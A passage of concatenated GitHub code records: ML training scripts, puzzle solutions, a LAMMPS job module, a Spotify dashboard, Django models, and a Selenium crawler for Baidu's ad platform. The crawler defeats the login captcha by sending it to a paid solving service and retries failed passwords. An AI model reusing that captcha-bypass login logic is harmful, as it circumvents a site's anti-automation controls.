(presum[r+1]-presum[l+1]) - dfs(l+1, r)\n memo[l][r] = (presum[r+1]-presum[l+1]) - dfs(l+1, r)\n # alice = max(alice, presum[r]-presum[l] - dfs(l, r-1))\n memo[l][r] = max(memo[l][r], presum[r]-presum[l] - dfs(l, r-1))\n\n return memo[l][r]\n return dfs(0, len(stones)-1)\n\nclass Solution:\n def stoneGameVII(self, stones: List[int]) -> int:\n n = len(stones)\n\n # presum = [0]*(n+1)\n # for i in range(1, n+1):\n # presum[i] = presum[i-1] + stones[i-1]\n presum = [0] + list(accumulate(stones))\n\n # dp[i][j]: the maximum difference when playing in stones[i:j]\n dp = [[-inf]*n for _ in range(n)]\n\n # n starts from 2 to 1000 at most\n # length = 2\n for i in range(n-1):\n dp[i][i+1] = max(stones[i], stones[i+1])\n\n for length in range(3, n+1):\n for i in range(n-length+1):\n j = i+length-1\n # remove i (leftmost)\n dp[i][j] = presum[j+1]-presum[i+1] - dp[i+1][j]\n \n # remove j (rightmost)\n dp[i][j] = max(dp[i][j], presum[j]-presum[i] - dp[i][j-1])\n return dp[0][n-1]\n","repo_name":"Vergil0327/leetcode-history","sub_path":"2-D Dynamic Programming/Interval/1690. Stone Game VII/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10624208988","text":"\n\nimport tensorflow as tf\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\n\n\ndata = pd.read_csv(\"Dataset_Final.csv\").set_index('DATE')\ndata.info()\n\n\n\n\ntarget = \"COND\"\nfeatures = [\"TEMP\",\"DEWP\",\"SLP\",\"VISIB\",\"WDSP\",\"PRCP\"]\n\ntrain, test = train_test_split(data, test_size=0.1)\n\nX_train = train[features]\ny_train = train[target]\nX_test = test[features]\ny_test = test[target]\n\nprint(\"Dimensions of the training set : {0}\".format(np.shape(X_train)))\nprint(\"Dimensions of the training set (target) : {0}\".format(np.shape(y_train.values.reshape(len(y_train),1))))\n\n\n# In[4]:\n\n\ndef model(hu, model_dir, features):\n feature_columns = [tf.feature_column.numeric_column(\"x\", shape=[len(features),1])]\n\n classifier = tf.estimator.DNNClassifier(feature_columns=feature_columns,\n hidden_units=hu,\n n_classes=3, \n model_dir=model_dir)\n # Define the training inputs\n train_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": np.array(X_train)},\n y=np.array(y_train.values.reshape((len(y_train),1))),\n num_epochs=None,\n shuffle=True,\n batch_size=8000)\n return classifier, train_input_fn\n\n\nclassifier, train_input_fn = model([50,50,50,50,50], \"./DNN\", features)\nclassifier.train(input_fn=train_input_fn, steps=40000)\n\n\ndef testinput(X_test, y_test):\n test_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": np.array(X_test)},\n y=np.array(y_test),\n num_epochs=1,\n shuffle=False)\n return test_input_fn\n\n\n# Evaluate accuracy.\naccuracy_score = classifier.evaluate(input_fn=testinput(X_test,y_test))[\"accuracy\"]\nprint(\"\\nTest Accuracy: {0:f}\\n\".format(accuracy_score))\nmy_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={\"x\": np.array(X_test[features])},\n y=None,\n num_epochs=1,\n shuffle=False)\npred = classifier.predict(input_fn=my_input_fn)\n\n\n\npredictions = list(pred)\npredictions[0]\nprint (predictions[0])\n\n\n\n\nfinal_pred = np.array([])\nfor p in predictions:\n final_pred = np.append(final_pred,p['class_ids'][0])\nfinal_pred = final_pred.astype(int)\n","repo_name":"arnnav/Weather-Forecasting","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"1825232446","text":"import os\nimport boto3\nfrom botocore.config import Config\nfrom pq_converter import LambdaProcessor\n\nendpoint = os.environ[\"ENDPOINT\"]\nendpoint_url = os.environ[\"ENDPOINT_URL\"]\n\n# boto3 session\nsession = boto3.Session()\n\nif endpoint == \"localstack\":\n print(\"Start Testing with Localstack\")\n s3 = session.resource(\"s3\", endpoint_url=endpoint_url, config=Config())\nelse:\n s3 = session.resource(\"s3\")\n\n\ndef lambda_handler(event, context) -> dict:\n processor = LambdaProcessor(event=event, context=context, s3=s3)\n return processor.main()","repo_name":"tosh2230/tf-serverless","sub_path":"aws/src/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"71166518727","text":"'''\nScript to train the dense saliency model\n\n@author: Hamed R. Tavakoli\n'''\nimport re\nimport os\nimport sys\nimport shutil\n\n\nimport torch\nimport torch.optim as optim\nimport torchvision.transforms as transforms\nfrom database import SalDB\nfrom deepsalmodelRes import DeepSal\n\n\nfrom lossfunctions import KLLoss, NEGNSSLoss, ACCLoss\n\ndevice = torch.device(torch.cuda.current_device() if torch.cuda.is_available() else \"cpu\")\ntorch.device(device)\n\n\nlearning_rate = 1e-8\n\nheight_dim = 256\nwidth_dim = 320\nts = (64, 80)\n\n\nclass TrainSal(object):\n\n def __init__(self, batch_size, num_workers, root_folder):\n super(TrainSal, self).__init__()\n\n self.model = DeepSal().to(device)\n self.model.train()\n\n self.val_loss = 0.0\n\n self.batch_size = batch_size\n self.num_workers = num_workers\n transform_1 = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])])\n\n transform_target = transforms.Compose([transforms.Grayscale(1),\n transforms.ToTensor()])\n\n self.train_db = SalDB(root_folder=root_folder, input_size=(height_dim, width_dim),\n output_size=ts, fold='train',\n input_transform=transform_1,\n target_transform=transform_target)\n self.valid_db = SalDB(root_folder=root_folder, input_size=(height_dim, width_dim),\n output_size=ts, fold='val',\n input_transform=transform_1,\n target_transform=transform_target)\n\n parameters = self.model.parameters()\n self.optimizer = optim.Adam(parameters, lr=learning_rate,\n weight_decay=0.0001)\n self.scheduler = optim.lr_scheduler.ReduceLROnPlateau(self.optimizer, factor=0.1, patience=1,\n verbose=True)\n\n self.criterion_nss = NEGNSSLoss().to(device)\n self.criterion_kld = KLLoss().to(device)\n self.criterion_acc = ACCLoss().to(device)\n\n def _disable_main_trunk_params(self):\n for param in self.model.encode_image.parameters():\n param.requires_grad = False\n\n def load_checkpoint(self, model_path):\n # support densenet and pytorch 0.4 added\n if os.path.isfile(model_path):\n print(\"=> loading checkpoint '{}'\".format(model_path))\n checkpoint = torch.load(model_path)\n\n # '.'s are no longer allowed in module names, but pervious _DenseLayer\n # has keys 'norm.1', 'relu.1', 'conv.1', 'norm.2', 'relu.2', 'conv.2'.\n # They are also in the checkpoints in model_urls. This pattern is used\n # to find such keys.\n pattern = re.compile(r'^(.*denselayer\\d+\\.(?:norm|relu|conv))\\.((?:[12])\\.(?:weight|bias|running_mean|running_var))$')\n state_dict = checkpoint['state_dict']\n for key in list(state_dict.keys()):\n res = pattern.match(key)\n if res:\n new_key = res.group(1) + res.group(2)\n state_dict[new_key] = state_dict[key]\n del state_dict[key]\n\n self.model.load_state_dict(state_dict=state_dict, strict=False)\n print(\"=> loaded checkpoint '{}' )\".format(model_path))\n else:\n print(\"=> no checkpoint found at '{}'\".format(model_path))\n\n def save_checkpoint(self, is_best, filename='checkpoint_{}x{}.pth.tar'.format(height_dim, width_dim), prefix=''):\n\n state = {'state_dict': self.model.state_dict(),\n 'optimizero': self.optimizer}\n torch.save(state, prefix + filename)\n if is_best:\n shutil.copyfile(prefix + filename, prefix + 'model_best_{}x{}.pth.tar'.format(height_dim, width_dim))\n\n def train_val_loop(self, epoch, fold):\n\n if fold == 'val':\n dbl = torch.utils.data.DataLoader(self.valid_db, batch_size=self.batch_size,\n shuffle=False, num_workers=self.num_workers)\n self.model.eval()\n torch.set_grad_enabled(False)\n if fold == 'train':\n dbl = torch.utils.data.DataLoader(self.train_db, batch_size=self.batch_size,\n shuffle=True, num_workers=self.num_workers)\n self.model.train()\n torch.set_grad_enabled(True)\n\n running_loss = 0.0\n\n data_iterator = iter(dbl)\n\n for it in range(len(dbl)):\n\n img_id, img, map, fix = data_iterator.next()\n img = img.to(device)\n map = map.to(device)\n fix = fix.to(device)\n\n saloutput = self.model(img)\n loss1 = self.criterion_nss(saloutput, fix)\n loss2 = self.criterion_kld(saloutput, map)\n loss3 = self.criterion_acc(saloutput, map)\n loss = 7*loss1 + loss2 + 2*loss3\n\n if torch.isnan(loss):\n print('\\nerror\\n')\n if fold == 'train':\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n running_loss += loss.item()\n\n sys.stdout.write(\"\\rEpoch %d -- %s %.01f%% -- Loss: %.03f\" %\n (epoch+1, fold, (it + 1) / len(dbl) * 100, running_loss / ((it + 1)*self.batch_size)))\n sys.stdout.flush()\n\n sys.stdout.write(\" \\n \")\n sys.stdout.flush()\n if fold == 'val':\n self.val_loss = running_loss / (it + 1)\n\n def train_val_model(self, num_epochs, log_dir, model_path=None):\n\n if model_path is not None:\n self.load_checkpoint(model_path)\n\n loss_value = 0\n for epoch in range(num_epochs):\n self.train_val_loop(epoch, 'train')\n self.train_val_loop(epoch, 'val')\n self.scheduler.step(self.val_loss)\n is_best = False\n if epoch > 0:\n if self.val_loss <= loss_value:\n loss_value = self.val_loss\n is_best = True\n else:\n loss_value = self.val_loss\n is_best = True\n self.save_checkpoint(is_best, prefix=log_dir)\n\n\nif __name__ == \"__main__\":\n\n folder = '/mnt/Databases/websal/data/'\n model_trainer = TrainSal(batch_size=4, num_workers=2, root_folder=folder)\n model_trainer.train_val_model(20, './web_model/', './log_res50/model_best_256x320.pth.tar')","repo_name":"hrtavakoli/WebSal","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6673,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"33133631249","text":"from selenium import webdriver\r\nimport logging\r\nimport time\r\nimport json\r\nimport os\r\n\r\nfrom platform_crawler.spiders.pylib.post_res import post_res\r\nfrom platform_crawler.utils.utils import Util\r\nfrom platform_crawler.utils.post_get import post\r\nfrom platform_crawler.settings import IMG_PATH, join\r\n\r\n\r\nu = Util()\r\nlogger = None\r\n\r\n\r\nclass BaiDuPhone:\r\n\r\n def __init__(self, user_info, log_name):\r\n global logger\r\n self.d = None\r\n self.acc= user_info.get('account')\r\n self.pwd = user_info.get('password')\r\n self.user_info = user_info\r\n logger = logging.getLogger(log_name)\r\n\r\n def init_driver(self):\r\n driver = webdriver.Chrome()\r\n driver.set_page_load_timeout(60)\r\n driver.set_script_timeout(30)\r\n driver.maximize_window()\r\n return driver\r\n\r\n def get(self, url):\r\n try:\r\n self.d.delete_all_cookies()\r\n self.d.get(url)\r\n except: # 超时重试一次\r\n self.d.delete_all_cookies()\r\n self.d.get(url)\r\n time.sleep(3)\r\n\r\n def deal_vc(self):\r\n # 裁剪\r\n element = self.d.find_element_by_id('img-captcha')\r\n img_path = join(IMG_PATH, 'vc.png')\r\n u.cutimg_by_driver(self.d, element, img_path)\r\n with open(img_path, 'br') as i:\r\n img = i.read()\r\n\r\n vc_res = u.rc.rk_create(img, 3040)\r\n vc = vc_res.get('Result').lower()\r\n # 验证\r\n self.d.find_element_by_name('entered_imagecode').send_keys(vc)\r\n self.d.find_element_by_id('btn-login').click()\r\n time.sleep(2)\r\n check_cookie = self.d.get_cookies()\r\n res = self.is_login(check_cookie)\r\n if not res.get('succ'):\r\n login_res = self.d.find_element_by_xpath('//div[@class=\"mod-login-inner\"]//span').text\r\n if login_res == '验证码错误':\r\n u.rc.rk_report_error(vc_res.get('Id'))\r\n return {'succ': False, 'msg': 'vc'}\r\n elif login_res == '用户名密码错误':\r\n return {'succ': False, 'msg': 'pd'}\r\n u.rc.rk_report(img, 3040, vc, vc_type=self.user_info.get('platform'))\r\n return {'succ': True}\r\n\r\n def is_login(self, cookie):\r\n param = int(time.time()*1000)\r\n url = 'http://baitong.baidu.com/request.ajax?path=appads/GET/basicinfo&reqid=%s_0' % param\r\n cookie = '; '.join(['%s=%s' % (e.get('name'), e.get('value')) for e in cookie])\r\n headers = {\r\n 'Accept': \"*/*\",\r\n 'Content-Type': \"application/x-www-form-urlencoded\",\r\n 'Cookie': cookie,\r\n 'Host': \"baitong.baidu.com\",\r\n 'Origin': \"http://baitong.baidu.com\",\r\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36\",\r\n }\r\n data = {\r\n 'path': 'appads/GET/basicinfo',\r\n 'params': {},\r\n 'eventId': '%s_0' % param\r\n }\r\n res = post(url, data=json.dumps(data), headers=headers)\r\n if not res.get('is_success'): # 网络异常\r\n return {'succ': False, 'msg': res.get('msg')}\r\n data = json.loads(res.get('msg').content)\r\n # logger.info(data)\r\n if data.get('status') != 200: # 登陆失败,两个key: retdesc, retcode\r\n return {'succ': False, 'msg': 'login failed'}\r\n else:\r\n return {'succ': True, 'msg': 'login success'}\r\n\r\n def login(self, retrytimes=0):\r\n url = 'https://baitong.baidu.com'\r\n try:\r\n self.get(url)\r\n self.d.find_element_by_class_name('to-login').click()\r\n time.sleep(1)\r\n self.d.find_element_by_name('entered_login').clear()\r\n self.d.find_element_by_name('entered_login').send_keys(self.acc)\r\n self.d.find_element_by_name('entered_password').clear()\r\n self.d.find_element_by_name('entered_password').send_keys(self.pwd)\r\n login_res = self.deal_vc() # 处理验证码和判断登陆结果\r\n if not login_res.get('succ') and login_res.get('msg') == 'vc':\r\n time.sleep(1)\r\n return self.login(retrytimes=retrytimes)\r\n elif not login_res.get('succ') and login_res.get('msg') == 'pd':\r\n if retrytimes == 5:\r\n return login_res\r\n retrytimes += 1\r\n time.sleep(1)\r\n return self.login(retrytimes=retrytimes)\r\n time.sleep(3)\r\n cookies = self.d.get_cookies()\r\n return {'succ': True, 'cookies': cookies, 'driver': self.d}\r\n except Exception as e:\r\n logger.error(e, exc_info=1)\r\n if retrytimes == 5:\r\n return {'succ': False, 'msg': 'unknown error', 'desc': e}\r\n retrytimes += 1\r\n time.sleep(1)\r\n return self.login(retrytimes=retrytimes)\r\n\r\n def run_login(self):\r\n self.d = self.init_driver()\r\n res = self.login()\r\n\r\n if not res.get('succ'):\r\n # status = False if res.get('msg') == 'pd' else 5\r\n # params = [self.user_info.get('id'), self.acc, self.user_info.get('platform'), None, status]\r\n # if not post_res(*params):\r\n # logger.error('login failed, post failed, account: %s' % self.acc)\r\n logger.info('login failed, post success')\r\n self.d.quit()\r\n res['invalid_account'] = True\r\n return res\r\n","repo_name":"Zwbdoctor/save_code","sub_path":"platform_crawler/spiders/get_login_data/login_baidu_phone_helper.py","file_name":"login_baidu_phone_helper.py","file_ext":"py","file_size_in_byte":5515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"41891811168","text":"from itertools import permutations\r\n\r\ndef read_input():\r\n file = open(\"Data/day13.txt\", \"r\")\r\n guests = {}\r\n \r\n for line in file:\r\n line = line.strip(\".\\n\").split()\r\n guests[(line[0], line[-1])] = int(line[3])\r\n \r\n if line[2] == \"lose\":\r\n guests[(line[0], line[-1])] *= -1\r\n \r\n return guests\r\n\r\ndef get_guest_list(guests):\r\n guest_list = set()\r\n for item in guests.keys():\r\n guest_list.add(item[0])\r\n \r\n return guest_list\r\n\r\ndef include_me(guests, guest_list):\r\n for person in guest_list:\r\n guests[(\"Me\", person)] = 0\r\n guests[(person, \"Me\")] = 0\r\n \r\n guest_list.add(\"Me\")\r\n \r\n return guests, guest_list\r\n\r\ndef seating_arrangement(guests, guest_list):\r\n max_happiness = 0\r\n \r\n for order in permutations(guest_list):\r\n happiness = 0\r\n \r\n for i in range(len(order)):\r\n happiness += guests[(order[i], order[(i+1)%len(order)])]\r\n happiness += guests[(order[(i+1)%len(order)], order[i])]\r\n \r\n max_happiness = max(max_happiness, happiness)\r\n \r\n return max_happiness\r\n \r\nif __name__ == \"__main__\":\r\n guests = read_input()\r\n guest_list = get_guest_list(guests)\r\n print(f\"Part one: {seating_arrangement(guests, guest_list)}\")\r\n guests, guest_list = include_me(guests, guest_list)\r\n print(f\"Part two: {seating_arrangement(guests, guest_list)}\")\r\n ","repo_name":"HarrisonGreen/Advent-of-Code-2015","sub_path":"Scripts/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19459080712","text":"#!/usr/bin/python\n\n# Module for setting up and performing lammps simulations\n# - Modifies the input scripts\n# - Modifies and sets up runs on the computer cluster\n# \n# Notes:\n# - init.mod modification needs a template init00.mod \n#\n# Last modified: April 21 2015\n#\n\nimport re, os, zipfile, shutil, subprocess\n\n# Functions for modification of init.mod\n#\ndef mod_init(parameters, pathT):\n \"\"\" Include new parameter set in init.mod file. \"\"\"\n with open(pathT + 'init0.mod', 'r') as fp:\n with open(pathT + 'init.mod', 'w') as fpo:\n lines = fp.readlines()\n linesOUT = ['\\n', '\\n']\n # Substitute parameters in each line\n for line in lines:\n linesOUT = sub_input(fp, line, linesOUT, parameters)\n fpo.write(''.join(linesOUT))\n \n \ndef sub_input(fp, line, linesOUT, parameters):\n \"\"\" Substitute new parameter values into init.mod file. \"\"\"\n \t# Find parameters that are to be changed\n for key in parameters:\n match = re.search(key, line)\n if match:\n # Find if match is a parameter declaration \n\t\t\t# this prevents from substituting expressions \n mnd = match.end()\n matchv = re.search('equal', line[mnd:])\n\t\t\t# If a declaration -- substitute new value \n if matchv:\n line0 = line[:mnd]\n line = re.sub(\"[0-9.]|e-|e[0-9]|e+[0-9]|\\n\", ' ', line[mnd:])\n line = line0 + line + parameters[key] + '\\n'\n linesOUT.append(line)\n return linesOUT\t\t \n\ndef num_atoms(n, pathT):\n \"\"\" Change number of atoms to use in the simulation. \"\"\"\n with open(pathT + 'init00.mod', 'r') as fp:\n with open(pathT + 'init0.mod', 'w') as fpo: \n lines = fp.readlines()\n for line in lines:\n fpo.write('replicate\\t'+ (n + ' ')*3 if 'replicate' in line else line)\n\ndef make_main(files, newdir, ensemble, split):\n \"\"\" Create main directory for LAMMPS simulations of ensemble with type split. \"\"\"\n # Remove old (if exists) and create new zipfile of type ensebmble for given split choice\n if split == 'n': \n inname = 'in.' + 'elastic_' + ensemble\n zipname = ensemble+'.zip'\n files.append(inname)\n elif split == '3n':\n inname_x = 'in.' + 'elastic_' + ensemble +'_x'\n inname_y = 'in.' + 'elastic_' + ensemble +'_y'\n inname_yz = 'in.' + 'elastic_' + ensemble +'_yz'\n zipname = ensemble+'.zip'\n files.append(inname_x)\n files.append(inname_y)\n files.append(inname_yz)\n try:\n os.remove(zipname)\n except OSError:\n pass\n zf = zipfile.ZipFile(zipname, 'a') \n try:\n for file in files:\n zf.write(file)\n finally:\n zf.close()\n # Make main directory for current results set\n os.mkdir(newdir)\n # Copy zip file to the main directory \n shutil.copy(zipname,newdir) \n return zipname\n\ndef make_dirs(path, newdir, T, zipname, ensemble, split):\n \"\"\" Create a directory for simulation at temperature T and subdirs if split is 3n. \"\"\"\n # Create the T directory\n dirname = 'T_'+ T\n pathT = path + newdir + '/' + dirname + '/'\n os.mkdir(pathT)\n # Unzip the zip file with scripts in the T directory\n zippath = path + newdir + '/' + zipname\n zf = zipfile.ZipFile(zippath)\n zf.extractall(pathT)\n # Modify according to split - create 3 directories and mv appropriate in. files into them \n if split == '3n':\n subdir = ['x', 'y', 'yz']\n for sub in subdir:\n pathsub = pathT + sub + '/'\n os.mkdir(pathsub)\n fname = 'in.' + 'elastic_' + ensemble + '_' + sub\n shutil.move(pathT + fname, pathsub)\n\ndef lmp_sub(p, T, pathT, split, ensemble):\n \"\"\" Submit the cluster submission script. \"\"\"\n if split == 'n': \n # Name and submit job in T_ directory\n # Make files executable\n subprocess.call(['chmod -R 700 *'], shell=True, cwd=pathT)\n fname = 'in.' + 'elastic_' + ensemble \n jobname = 'jobT' + T \n sub_command = 'submit_lammps_parallel.pl' + ' ' + fname + ' ' + p + ' ' + jobname + ' ' + '| qsub'\n subprocess.call([sub_command], shell=True, cwd=pathT)\n elif split == '3n':\n # Copy all files from /.../Ti/ to each subdirectory\n # appropriate in. files are mv there in make_dirs\n # Name and submit the jobs in each subdirectory\n # Make files executable\n subdir = ['x', 'y', 'yz']\n for sub in subdir:\n pathsub = pathT + sub + '/'\n fname = 'in.' + 'elastic_' + ensemble + '_' + sub \n jobname = 'jobT' + T + '_' + sub \n sub_command = 'submit_lammps_parallel.pl' + ' ' + fname + ' ' + p + ' ' + jobname + ' ' + '| qsub'\n subprocess.call(['cp *.* '+ pathsub], shell=True, cwd=pathT)\n subprocess.call(['chmod -R 700 */'], shell=True, cwd=pathT)\n subprocess.call([sub_command], shell=True, cwd=pathsub)\n\n\n","repo_name":"atruszkowska/NiElastic_LAMMPS_PYTHON","sub_path":"runlmp.py","file_name":"runlmp.py","file_ext":"py","file_size_in_byte":5035,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"27601188853","text":"import streamlit as st\nimport pandas as pd\nimport plotly.express as px\n\n\nNAME_MAP = {\n 'rauwedouwe': 'Douwe',\n '1pat8ir5aqzhzvs7ygs1jp8ga': 'Marcel',\n 'basmerbel': 'Bas',\n '31hbrww3peprl3puzzaqqf6yfycy': 'Cas',\n 'carmenvs': 'Carmen',\n '11140450740': 'Bryan',\n 'hankmoody420': 'Han'\n}\ndef map_user_names(name):\n if name in NAME_MAP:\n return NAME_MAP[name]\n else:\n return name\n\n\nFEATURE_GRAPH_MAP = {\n 'duur' : {\n 'x': 'duration_min',\n 'title': 'Duur',\n 'range_x': [0, None],\n 'labels': {'duration_min': 'Lengte (min)'}\n },\n 'tempo' : {\n 'x': 'tempo',\n 'title': 'Tempo',\n 'labels': {'tempo': 'tempo (bpm)'}\n }, \n 'populariteit' : {\n 'x': 'popularity',\n 'title': 'Populariteit',\n 'range_x': [0, 100],\n 'labels': {'popularity': 'populariteit'}\n },\n 'dancability' : {\n 'x': 'dancability',\n 'title': 'Dancability',\n 'range_x': [0, 1],\n 'labels': {'dancability': 'dancability'}\n },\n 'energie' : {\n 'x': 'energy',\n 'title': 'Energie',\n 'range_x': [0, 1],\n 'labels': {'energy': 'energie'}\n },\n 'luidheid' : {\n 'x': 'loudness',\n 'title': 'Luidheid',\n 'labels': {'loudness': 'luidheid (dB)'}\n },\n 'instrumentaalheid' : {\n 'x': 'instrumentalness',\n 'title': 'Instrumentaalheid',\n 'range_x': [0, 1],\n 'labels': {'instrumentalness': 'instrumentaalheid'}\n },\n 'blijheid' : {\n 'x': 'valence',\n 'title': 'Blijheid',\n 'range_x': [0, 1],\n 'labels': {'valence': 'blijheid'}\n },\n 'live-heid' : {\n 'x': 'liveness',\n 'title': 'Live-heid',\n 'range_x': [0, 1],\n 'labels': {'liveness': 'live-heid'}\n }\n}\n\ndf = pd.read_csv('data/tracks.csv')\ndf['user'] = df['user'].map(map_user_names)\ndf['duration_min'] = df['duration'].apply(lambda x: x / 60)\ndf['artists'] = df['artists'].apply(lambda x: [a.strip() for a in x[1:-1].replace(\"'\", '').replace('\"', '').split(',')])\ndf['popularity'] = df['popularity'].astype(float)\n\nst.set_page_config(page_title='🎵 Playlist', layout='wide')\n\nst.title('🏄‍♂️ Unicornication 2022 🏄‍♀️')\n\n\nst.sidebar.image('unicorn.png')\nselected_user = st.sidebar.multiselect('Selecteer gebruiker', df['user'].unique(), default=df['user'].unique())\nselected_feature = st.sidebar.selectbox('Kies een eigenschap', sorted(list(FEATURE_GRAPH_MAP.keys())))\n\nfiltered_df = df[['user', 'name', 'artists', FEATURE_GRAPH_MAP[selected_feature]['x']]]\nfiltered_df = filtered_df[filtered_df['user'].isin(selected_user)]\n\n\nst.dataframe(filtered_df)\n\nfig = px.histogram(\n filtered_df, \n histnorm='percent', \n **FEATURE_GRAPH_MAP[selected_feature]\n)\nst.plotly_chart(fig, use_container_width=True)\n\n\n","repo_name":"CasvandenBogaard/spotify-dashboard","sub_path":"1_🎵_Playlist.py","file_name":"1_🎵_Playlist.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"38982778009","text":"import re\nfrom datetime import datetime\nfrom django.utils.timezone import now\nfrom django.db.models.aggregates import Max\nfrom django.db.models.deletion import ProtectedError\nfrom django.db.models.functions.comparison import Coalesce\nfrom django_jalali.db import models as jmodels\nfrom django.core.validators import RegexValidator\nfrom django.db import models\nimport django.db.models.options as options\nfrom rest_framework.exceptions import ValidationError\n\nfrom helpers.functions import get_current_user, get_new_child_code\n\noptions.DEFAULT_NAMES = options.DEFAULT_NAMES + ('backward_financial_year', 'permission_basename')\n\n\nclass BaseManager(models.Manager):\n\n def hasAccess(self, method, permission_basename=None, use_financial_year=True, financial_year=None):\n user = get_current_user()\n\n if not user:\n return super().get_queryset()\n\n if hasattr(self.model, 'financial_year') and use_financial_year:\n queryset = self.inFinancialYear(financial_year)\n else:\n queryset = super().get_queryset()\n\n if not permission_basename:\n permission_basename = self.model._meta.permission_basename\n\n if not permission_basename:\n raise Exception(\"Please set permission_basename in {} Meta class or pass it to method\".format(self))\n\n method = method.upper()\n if method == 'POST':\n operation = \"create\"\n elif method == 'GET':\n operation = \"get\"\n elif method == 'PUT':\n operation = \"update\"\n elif method == 'DELETE':\n operation = \"delete\"\n else:\n operation = method\n\n if user.has_perm(\"{}.{}\".format(operation, permission_basename)):\n return queryset\n else:\n if user.has_perm(\"{}Own.{}\".format(operation, permission_basename)):\n return queryset.filter(created_by=user)\n\n return queryset.none()\n\n def inFinancialYear(self, financial_year=None):\n from helpers.functions import get_current_user\n qs = super().get_queryset()\n\n company = None\n if financial_year:\n company = financial_year.company\n else:\n user = get_current_user()\n\n if not user:\n return super().get_queryset()\n\n financial_year = user.active_financial_year\n if financial_year:\n company = financial_year.company\n\n qs = qs.filter(financial_year__company=company)\n\n if self.model._meta.backward_financial_year:\n return qs.filter(financial_year__id__lte=financial_year.id)\n else:\n return qs.filter(financial_year=financial_year.id)\n\n\nclass BaseModel(models.Model):\n created_by = models.ForeignKey('users.User', on_delete=models.PROTECT, null=True, related_name='+')\n created_at = jmodels.jDateTimeField(auto_now=True, null=True)\n updated_at = jmodels.jDateTimeField(auto_now_add=True, null=True)\n is_auto_created = models.BooleanField(default=False)\n\n class Meta:\n abstract = True\n permissions = ()\n default_permissions = ()\n ordering = ['-pk']\n backward_financial_year = False\n permission_basename = None\n get_latest_by = 'pk'\n\n objects = BaseManager()\n\n def save(self, *args, **kwargs) -> None:\n if not self.pk:\n self.created_by = get_current_user()\n else:\n if isinstance(self, LockableMixin) and not kwargs.pop('toggling_lock', False) and self.is_locked:\n raise ValidationError(\"ابتدا قفل را باز کنید\")\n\n super().save(*args, **kwargs)\n\n def delete(self, *args, **kwargs):\n try:\n result = super(BaseModel, self).delete(*args, **kwargs)\n except ProtectedError as e:\n obj = e.protected_objects[0]\n raise ValidationError({\n 'non_field_error': 'ابتدا داده های وابسته را حذف نمایید',\n 'related_id': obj.id,\n 'related_class': obj.__class__.__name__\n })\n\n return result\n\n def update(self, **kwargs) -> None:\n for key in kwargs.keys():\n setattr(self, key, kwargs[key])\n self.save()\n\n\nclass LocalIdMixin(models.Model):\n local_id = models.BigIntegerField(null=True, blank=True, default=None)\n\n @property\n def financial_year(self):\n raise NotImplementedError()\n\n class Meta:\n abstract = True\n\n def save(self, *args, **kwargs) -> None:\n if not self.pk:\n self.local_id = self.__class__.objects.inFinancialYear(self.financial_year).aggregate(\n local_id=Coalesce(Max('local_id'), 0)\n )['local_id'] + 1\n super().save(*args, **kwargs)\n\n\nclass TreeMixin(models.Model):\n\n @property\n def CODE_LENGTHS(self):\n raise NotImplementedError()\n\n explanation = models.CharField(max_length=255, blank=True, null=True)\n\n level = models.IntegerField()\n code = models.CharField(max_length=100)\n parent = models.ForeignKey('self', on_delete=models.CASCADE, related_name='children', blank=True, null=True)\n\n class Meta:\n abstract = True\n\n def get_new_child_code(self):\n last_child_code = None\n\n last_child = self.children.order_by('-code').first()\n if last_child:\n last_child_code = last_child.code\n\n return get_new_child_code(\n self.code,\n self.CODE_LENGTHS[self.level + 1],\n last_child_code\n )\n\n @classmethod\n def get_new_code(cls):\n code = cls.objects.inFinancialYear().filter(level=0).aggregate(\n last_code=Max('code')\n )['last_code']\n\n if code:\n code = int(code) + 1\n else:\n code = 0\n\n if code < 9:\n code += 10\n\n if code >= 99:\n from rest_framework import serializers\n raise serializers.ValidationError(\"تعداد عضو های این سطح پر شده است\")\n\n return str(code)\n\n\nclass DefinableManager(BaseManager):\n\n def definites(self, financial_year=None):\n return self.inFinancialYear(financial_year).filter(is_defined=True)\n\n def indefinites(self, financial_year=None):\n return self.inFinancialYear(financial_year).filter(is_defined=False)\n\n\nclass DefinableMixin(models.Model):\n is_defined = models.BooleanField(default=False)\n defined_by = models.ForeignKey('users.User', on_delete=models.PROTECT, blank=True, null=True, related_name='+')\n definition_date = models.DateTimeField(blank=True, null=True)\n\n objects = DefinableManager()\n\n class Meta:\n abstract = True\n\n def define(self, date=None):\n if not self.is_defined:\n self.is_defined = True\n self.defined_by = get_current_user()\n self.definition_date = date or now()\n self.save()\n\n def indefine(self):\n self.is_defined = False\n self.defined_by = None\n self.definition_date = None\n self.save()\n\n\nclass LockableMixin(models.Model):\n \"\"\"\n Lock will be checked in BaseModel save method\n \"\"\"\n is_locked = models.BooleanField(default=False)\n locked_by = 